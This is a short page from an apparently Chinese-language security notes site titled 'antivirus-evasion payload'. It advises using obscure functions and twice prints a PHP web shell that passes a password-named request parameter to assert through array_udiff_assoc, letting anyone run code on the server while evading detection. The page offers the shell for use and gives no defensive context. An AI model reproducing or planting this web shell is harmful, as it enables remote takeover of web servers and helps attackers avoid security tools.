免杀payload
用偏僻函数
<?php
$password = "wintry";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>免杀思路
Last updated
Was this helpful?
<?php
$password = "wintry";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>Last updated
Was this helpful?
Was this helpful?